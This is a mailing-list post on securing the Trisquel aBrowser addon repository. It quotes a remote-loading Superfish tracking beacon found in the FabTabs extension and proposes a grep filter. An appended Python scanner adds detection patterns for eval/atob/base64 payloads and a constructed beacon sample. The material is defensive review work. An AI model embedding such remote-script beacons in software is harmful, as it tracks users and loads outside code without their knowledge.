Hello,

I have noticed that the Trisquel aBrowser addon repository is susceptible to several threat vectors.

1) Random users signing up and changing the download location of .xpi files. This could be used to inject malicious code to unknowing users.

Solution:
a) Assign moderators who will check addons for approval, similar to AMO, before going live.
b) Whitelist certain domains, e.g. only allow the URL to contain download links from "https://addons.mozilla.org" since they are generally being checked by others.

2) Non-free blobs can still exist in supposedly free code and must be reviewed. Taking for example a recent finding in FabTabs: https://trisquel.info/en/browser/addons/fabtabs

While manually inspecting the code I found this interesting line located in "/chrome/content/fabtab/content.js":

    script.src = 'http://www.superfish.com/ws/sf_main.jsp?dlsource=fgzqxwui&userId=c4aa8323-83ff-4385-a2df-d45f8c1ce97a&CTID=fabtab';

This code appears to be a web beacon and directly links to non-free code outside of the original xpi! Thankfully this outside code appears only to have analytics/tracking built in and no actual malicious intent other than ensuring HTTPS is OFF whenever it queries the beacon (contains URL rewrites). However, this opens the door for much larger problems.

Someone should be proactively studying extensions prior to upload, and/or implement a small filter which can catch certain artifacts at minimum. One such makeshift bash script I whipped up (could use some work):

    # -a: treat the concatenated members as text, so grep does not stop with
    # "Binary file matches" when an image inside the xpi precedes the scripts
    unzip -p *.xpi | grep -a -E 'https?://|eval\(base64_decode'

This outputs all links and any base64 found inside of an xpi to the terminal, and can catch the superfish web beacon.

Just some thoughts.
:)

_______________________________________________
Trisquel-devel mailing list
[email protected]
http://listas.trisquel.info/mailman/listinfo/trisquel-devel
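The post proposes two controls: a domain whitelist for where an addon may point, and a pre-upload filter that catches URLs and base64/eval artifacts inside the .xpi. The following Python script is an added example that combines both; it is not the poster's bash one-liner and not Trisquel repository code. It reads an .xpi as the zip archive it is, scans only text-like members, records every URL (noting plaintext http and whether the host is on an assumed allowlist), flags dynamic-code constructs such as eval/atob/script.src assignments, and spots long base64 runs. The allowlist contents, the member suffix list, and the sample xpi built in memory (with a constructed beacon-style URL, not the real superfish one) are all assumptions for this example.

```python
import io
import re
import zipfile
from urllib.parse import urlparse

# Hosts an extension may reference without being flagged (assumed allowlist for this example).
ALLOWED_HOSTS = {"addons.mozilla.org", "trisquel.info"}

# Only members with these suffixes are treated as reviewable text; images etc. are skipped.
TEXT_SUFFIXES = (".js", ".jsm", ".json", ".html", ".xhtml", ".xul", ".rdf", ".manifest", ".css")

URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
# Constructs worth a reviewer's eye: runtime script loading, dynamic eval, embedded decoders.
SUSPICIOUS_RE = re.compile(
    r"eval\s*\(|base64_decode|atob\s*\(|new\s+Function\s*\(|\.src\s*=\s*['\"]https?://"
)
# A long run of base64 alphabet characters, typical of an embedded payload.
LONG_B64_RE = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")


def scan_xpi(data: bytes) -> list:
    """Return one finding dict per URL, suspicious construct or base64 blob in the xpi."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(TEXT_SUFFIXES):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            for lineno, line in enumerate(text.splitlines(), 1):
                base = {"file": info.filename, "line": lineno}
                for m in URL_RE.finditer(line):
                    url = m.group(0)
                    host = (urlparse(url).hostname or "").lower()
                    findings.append({**base, "kind": "url", "value": url,
                                     "plaintext": url.startswith("http://"),
                                     "allowed_host": host in ALLOWED_HOSTS})
                for m in SUSPICIOUS_RE.finditer(line):
                    findings.append({**base, "kind": "suspicious", "value": m.group(0)})
                for m in LONG_B64_RE.finditer(line):
                    findings.append({**base, "kind": "base64", "value": m.group(0)[:24] + "..."})
    return findings


def flag_for_review(findings: list) -> list:
    """Turn findings into human-readable reasons a moderator should hold the addon."""
    reasons = []
    for f in findings:
        where = f"{f['file']}:{f['line']}"
        if f["kind"] == "url":
            if f["plaintext"]:
                reasons.append(f"{where}: plaintext http URL {f['value']}")
            if not f["allowed_host"]:
                reasons.append(f"{where}: host not on allowlist in {f['value']}")
        else:
            reasons.append(f"{where}: {f['kind']} construct {f['value']}")
    return reasons


def build_sample_xpi() -> bytes:
    """Constructed xpi (not a real addon) with one beacon-style script load and one blob."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("install.rdf",
                    "<RDF><em:updateURL>https://addons.mozilla.org/update.rdf</em:updateURL></RDF>\n")
        zf.writestr("chrome/content/sample/content.js",
                    "var script = document.createElement('script');\n"
                    "script.src = 'http://beacon.example/ws/main.jsp?dlsource=demo"
                    "&userId=00000000-0000-0000-0000-000000000000';\n"
                    "document.head.appendChild(script);\n"
                    "var payload = atob(\"" + "QUFB" * 20 + "\");\n")
        zf.writestr("icon.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)  # binary member, skipped
    return buf.getvalue()


if __name__ == "__main__":
    for reason in flag_for_review(scan_xpi(build_sample_xpi())):
        print(reason)
```

Running it against the constructed sample prints five reasons: the beacon URL is flagged twice (plaintext http and a host outside the allowlist), the `script.src = 'http://` assignment and the `atob(` call are each flagged as suspicious constructs, and the 80-character base64 string is reported as an embedded blob; the `addons.mozilla.org` update URL passes. Scanning the zip members directly, rather than piping `unzip -p` through grep, is what lets the report say which file and line each hit came from.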
